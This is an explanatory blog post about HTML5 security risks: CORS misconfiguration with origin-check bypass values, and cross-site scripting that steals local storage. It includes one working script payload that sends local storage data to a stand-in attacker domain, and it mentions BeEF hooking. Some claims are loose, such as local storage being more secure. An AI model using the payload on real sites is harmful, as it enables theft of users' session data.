HTML5, the fifth standard of HTML released in 2014, is slowly becoming more prevalent across the internet as browsers adopt the new protocol and webpages are updated to make use of the new features. HTML is the technology at the basis of the internet, and acts as the structured content on webpages – text & images (and now with HTML5 videos too) all appear in HTML code on a webpage. HTML5 attempts to bridge the gap left by old HTML standards, which failed to natively support multimedia and extensive API’s. Two of these new features are CORS (Cross Origin Resource Sharing) and Local Storage.
CORS came about because developers felt restricted by the same-origin policy (an essential concept in web application security) and therefore felt a need to work around it. The same-origin policy (SOP) is used within web browsers to restrict access originating from one domain from accessing content originating from another. For example, say you have your banking information opened in one tab, and then you access another malicious website in another tab. The same-origin policy prevents that malicious website from making requests from your browser on your behalf (using AJAX calls made from scripts received from a malicious site, which allow your browser to transfer data with a server without refreshing the page) and impersonating you, which would allow that malicious website to steal your money.
CORS brings about new ways to share resources between domains which circumvent SOP restrictions. The rules set for CORS which allow cross domain access are established within HTTP headers. One such header is the “Access-Control-Allow-Origin” header, which specifies which origins are allowed to share resources. If this header is set to the “*” (wildcard) value, any origins are allowed to share data. Even if headers seem to be set securely, validation bypass techniques can be used. For example, to bypass an origin set to www.government.com, and attacker could try the following values and see if they might circumvent restrictions: wwwxgovernment.com, www.government.com.malicious.site, null values, etc, to trick the underlying system. This means if you had visited your banking site and a malicious site in another tab, the malicious site can use AJAX requests from your browser to share information with your banking account and you wouldn’t even be able to tell this was going on in the background. Depending on how other headers are configured, this could let an attacker impersonate you on your bank account and rob you of your hard earned money, all because developers didn’t implement the CORS protocol securely, or validate/sanitize input correctly.
Another feature introduced in HTML5 is local storage. Before local storage, data shared between websites and browsers was stored in objects called cookies. Local storage simply increases the security and size of data stored within a browser. Think of this local storage as a database for website data in your browser. Inherently, different applications over the internet cannot access each other’s local storage, even with CORS. However, this data can be attacked through another vulnerability called XSS (cross-site scripting), which occurs when a malicious attacker injects javascript into a web application that doesn’t sanitize input data.
For example, see the comment section at the bottom of this page? If an attacker injected a <script></script> HTML tag into the comment box and the website didn’t sanitize the data, the attacker could inject javascript into his comment. Whenever a visitor loaded the page, they would load the attackers comment which includes his javascript code, which could steal session cookies from the same domain and send them to the attacker so he could essentially take control of unsuspecting user accounts. XSS is a vulnerability where an attacker can inject javascript into an applications original HTML markup, therefore bypassing SOP or CORS restrictions. XSS vulnerabilities work well for stealing data from local storage. Injecting this script does just that:
<script>document.write("<img src='http://attackersite.com?cookie="+localStorage.getItem('foo')+"'>"); </script> // Where ‘foo’ is local storage object to be extracted and written to attacker controlled domain
Also, if a user has access to their browser, they have access to all local storage data. For example, if a victim’s browser is hooked with BeEF, all local storage data can simply be extracted. For these reasons it is not recommended that sensitive data is stored in local storage.
Because most web vulnerabilities exist because web developers implemented a site poorly, adding new features means that many lazy developers will inevitably create new attack vectors. This is great news for hackers, but unfortunately bad news for everybody else.
The post HTML5 Introduces New Security Threats! appeared first on Deep Dot Web.